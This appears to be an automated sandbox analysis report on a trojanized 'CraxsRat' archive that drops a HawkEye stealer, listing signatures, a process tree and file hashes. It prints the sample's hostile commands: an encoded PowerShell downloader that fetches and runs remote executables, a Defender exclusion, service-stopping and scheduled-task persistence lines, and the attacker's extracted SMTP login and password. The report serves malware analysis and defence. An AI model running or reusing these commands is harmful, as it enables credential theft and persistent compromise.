Analysis
-
max time kernel
529s -
max time network
507s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
21-06-2023 00:19
General
-
Target
https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip
Malware Config
Extracted
https://rentry.org/nipkv/raw
Extracted
Protocol: smtp- Host:
smtp.zoho.com - Port:
587 - Username:
nexusbuscasg@zohomail.com - Password:
Nescau71#
Signatures
-
HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
NirSoft MailPassView 6 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 4 IoCs
Password recovery tool for various web browsers
-
Nirsoft 9 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 13 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies system executable filetype association 2 TTPs 8 IoCs
-
Registers COM server for autorun 1 TTPs 3 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 60 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd62bd9758,0x7ffd62bd9768,0x7ffd62bd97783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5524 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5680 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5820 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5964 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6112 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5692 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6028 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6368 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5408 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5304 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5784 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:83⤵
-
C:\Users\Admin\Downloads\winrar-x64-622.exe"C:\Users\Admin\Downloads\winrar-x64-622.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinRAR\uninstall.exe"C:\Program Files\WinRAR\uninstall.exe" /setup4⤵
- Executes dropped EXE
- Modifies system executable filetype association
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5148 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ver -imon1 -- "C:\Users\Admin\Downloads\CraxsRat_4.0.1.zip" "?\"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"5⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"5⤵
-
C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\WinRAR\Rar.txtFilesize
109KB
MD518eeb70635ccbe518da5598ff203db53
SHA1f0be58b64f84eac86b5e05685e55ebaef380b538
SHA25627b85e1a4ff7df5235d05b41f9d60d054516b16779803d8649a86a1e815b105b
SHA5120b2a295b069722d75a15369b15bb88f13fbda56269d2db92c612b19578fc8dadf4f142ebb7ee94a83f87b2ddd6b715972df88b6bb0281853d40b1ce61957d3bd
-
C:\Program Files\WinRAR\RarExt.dllFilesize
664KB
MD5608f972a89e2d43b4c55e4e72483cfd5
SHA11b58762a3ae9ba9647d879819d1364e787cb3730
SHA256dd989631b1b4f5450766ad42aec9a0e16718a0d23bc694fa238a4d54b02be417
SHA5123c410d19aaa780e4fe25b331f85bdd8ccd0a9f585d538afdf216dfcd5c3a6ee911924bcca9078af689c4610f23a31e5a89c7c84144356e8dedceac7fb020960a
-
C:\Program Files\WinRAR\Uninstall.exeFilesize
437KB
MD536297a3a577f3dcc095c11e5d76ede24
SHA1ace587f83fb852d3cc9509386d7682f11235b797
SHA256f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631
-
C:\Program Files\WinRAR\Uninstall.exeFilesize
437KB
MD536297a3a577f3dcc095c11e5d76ede24
SHA1ace587f83fb852d3cc9509386d7682f11235b797
SHA256f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631
-
C:\Program Files\WinRAR\WhatsNew.txtFilesize
103KB
MD5eaeee5f6ee0a3f0fe6f471a75aca13b8
SHA158cd77ef76371e349e4bf9891d98120074bd850c
SHA256f723976575d08f1001b564532b0a849888135059e7c9343c453eead387d7ae4c
SHA5123fc5994eefce000722679cf03b3e8f6d4a5e5ebfd9d0cc8f362e98b929d1c71e35313a183bfe3ab5adbd9ce52188ade167b8695a58ebd6476189b41627512604
-
C:\Program Files\WinRAR\WinRAR.chmFilesize
317KB
MD511d4425b6fc8eb1a37066220cac1887a
SHA17d1ee2a5594073f906d49b61431267d29d41300e
SHA256326d091a39ced3317d9665ed647686462203b42f23b787a3ed4b4ad3e028cc1e
SHA512236f7b514560d01656ffdee317d39e58a29f260acfd62f6b6659e7e2f2fca2ac8e6becac5067bab5a6ceaeaece6f942633548baeae26655d04ac3143a752be98
-
C:\Program Files\WinRAR\WinRAR.exeFilesize
2.5MB
MD504fbad3541e29251a425003b772726e1
SHA1f6916b7b7a42d1de8ef5fa16e16409e6d55ace97
SHA2560244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7
SHA5123e85cf46dd5a7cadc300488e6dadea7f271404fb571e46f07698b3e4eaac6225f52823371d33d41b6bbd7e6668cd60f29a13e6c94b9e9cb7e66090af6383d8b2
-
C:\Program Files\WinRAR\WinRAR.exeFilesize
2.5MB
MD504fbad3541e29251a425003b772726e1
SHA1f6916b7b7a42d1de8ef5fa16e16409e6d55ace97
SHA2560244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7
SHA5123e85cf46dd5a7cadc300488e6dadea7f271404fb571e46f07698b3e4eaac6225f52823371d33d41b6bbd7e6668cd60f29a13e6c94b9e9cb7e66090af6383d8b2
-
C:\Program Files\WinRAR\uninstall.exeFilesize
437KB
MD536297a3a577f3dcc095c11e5d76ede24
SHA1ace587f83fb852d3cc9509386d7682f11235b797
SHA256f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
576B
MD5aa7f7359bf5f64b4053726c789d5494a
SHA1d737378fc1553837d1d9883666f9fb3fbdc535d0
SHA256deeb6a87b010ccd855fafde546c5341efc3bd3bdc3fa9596fafbbed7f76f2c1f
SHA51292f9b442cc1227c67c0b74a76a174c3df2996efc76c014a92c3c8ab87958759f9ff6f9d9fa346c206fb26c3cbc7cce5f203aef636b9d08108aee51ce5b689af0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD51c606acbee97ce6eba267c191a2b39fb
SHA1085d3a6e3fd0e09e23e48db64e17527872c84c25
SHA25694dc4c918af6432468d34683f7227b334a6dff3913b75140a9a8c856efe7a588
SHA512afea44d9ff01dd4c6a641d9bc09230fa56027dcb22c89817c99514f663b041e4a11d20a3bb89a9ee34d50f3f5f2a264dcd775235d345a1eb22e4bb9e673648cf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5f283eba8092b16cfbcfaa20e536d7ea0
SHA1a7945d8de0bc5628a8f498365150959c24521d56
SHA256cd4b21656681db95778cbe8e144d75ebecde08b471eae09d5841ad10937329b8
SHA5129334a1c674b22153de7d12dcfaebbfa08a5fee55b3bddb54feed4b9d672ea24e6a06604fac148cabc39ffa7fdb81c21fc50b87072b872c9693fdd69a03d51238
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD56c5d0785d213b5c91fcffe10c171a5a0
SHA1bcc22eeb8b2bf7346c6179b7c5f015bd094d4ef8
SHA2560737f39034bd7e8c4f3a03e3286a67f3885e5a10556d4bff3ddaffe07e54ed2d
SHA512b234cf42401cd849a1df5de55ce9eeacfc745e8ed8df45939962620ec3e91d6034e424ef1c81321149d9757d052333b0e184c95a6ca5c610aaff9baaf2453ac9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
872B
MD5eeaface4d0adb3f46276381fea765c7d
SHA17fac5742b2569721b5ed5fcd196cb01ba73f4df4
SHA256e5aea05406ee1cb6e5aa4c5cd670cd0e7e53dfb9c740e5175d21682aac89c740
